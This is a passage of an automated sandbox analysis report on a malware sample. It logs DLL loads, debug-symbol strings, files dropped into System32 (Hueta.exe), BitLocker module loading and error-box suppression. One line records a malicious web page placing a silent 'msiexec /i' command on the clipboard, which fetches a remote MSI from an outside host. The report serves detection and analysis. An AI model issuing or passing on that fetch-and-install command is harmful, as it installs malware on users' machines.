              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appidapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: virtdisk.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\Hueta.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\Hueta.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Windows\System32\Hueta.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\Hueta.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Windows\System32\Hueta.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\Hueta.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\Hueta.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\Hueta.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile written: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\msiwrapper.iniJump to behavior
              Source: C:\Windows\SysWOW64\expand.exeFile opened: C:\Windows\LOGS\DPX\setuplog.cfgJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642 source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: `\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642 source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: :C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb&l source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 4\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb,lg source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642B source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 2\??\C:\Users\user\AppData\Local\Temp\Win11Debloatrod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: winload_prod.pdb3d8bbwe source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: rod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\C688AAF2BB4DE0FE26E41A66F7E016D21\Local State source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\C688AAF2BB4DE0FE26E41A66F7E016D21 source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ntdll.pdbUGP source: chrome.exe, 00000000.00000002.2039759855.00000166927ED000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: h\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\C688AAF2BB4DE0FE26E41A66F7E016D21\Local Statef source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642 source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 8\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb)l` source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\C688AAF2BB4DE0FE26E41A66F7E016D21 source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 9C:\Users\user\AppData\Local\Temp\Win11Debloat\d_prod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: :\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb=l source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: gC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642\ source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642t source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: winload_prod.pdb source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: cC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\C688AAF2BB4DE0FE26E41A66F7E016D21\cal State\EBWebView source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\Local State^ source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 6C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb0447 source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 6C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbeData source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\C688AAF2BB4DE0FE26E41A66F7E016D21\ source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642\Local State source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ntdll.pdb source: chrome.exe, 00000000.00000002.2039759855.00000166927ED000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: WINLOA~1.PDBwinload_prod.pdb1.0-7e3544113374bc2769af5f67e125ab81de1b4b64c07fe68e2a7bc03646c85dfc source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 6C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb#lj source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: rC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: d_prod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\C688AAF2BB4DE0FE26E41A66F7E016D21G source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642\ source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: v\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbe source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\3A3D9B5EA50AEA49456BBD7BB8A6EE642ate\ source: cmd.exe, 0000001D.00000003.1902003472.00000226096D3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1902293304.00000226096D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: >\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbRl} source: cmd.exe, 0000001D.00000003.1901960403.0000022609691000.00000004.00000020.00020000.00000000.sdmp
              Source: gr0D62WdkfOXqpbHbRHp.25.drStatic PE information: real checksum: 0x2571a6 should be: 0x2547a4
              Source: 3b4007d200875d4c9c58c44073469727.tmp.23.drStatic PE information: section name: .fptable
              Source: gr0D62WdkfOXqpbHbRHp.25.drStatic PE information: section name: .xdata

              Persistence and Installation Behavior

              barindex
              Drops executables to the windows directory (C:\Windows) and starts them
              Source: unknownExecutable created and started: C:\Windows\system32\Hueta.exe
              HTML page adds supicious text to clipboard
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeClipboard modification: msiexec /i https://kolepti.com/flare.msi /qn
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE1FD.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeFile created: C:\Users\user\AppData\Local\Temp\gr0D62WdkfOXqpbHbRHpJump to dropped file
              Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe (copy)Jump to dropped file
              Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\6ff0d56ce15b47fcb2f8c73e3a3af1d7$dpx$.tmp\3b4007d200875d4c9c58c44073469727.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeFile created: C:\Windows\System32\Hueta.exeJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE1FD.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeFile created: C:\Windows\System32\Hueta.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeFile created: C:\Users\user\AppData\Local\Temp\gr0D62WdkfOXqpbHbRHpJump to dropped file

              Hooking and other Techniques for Hiding and Protection

              barindex
              Found hidden mapped module (file has been removed from disk)
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\GR0D62WDKFOXQPBHBRHP
              Loading BitLocker PowerShell Module
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
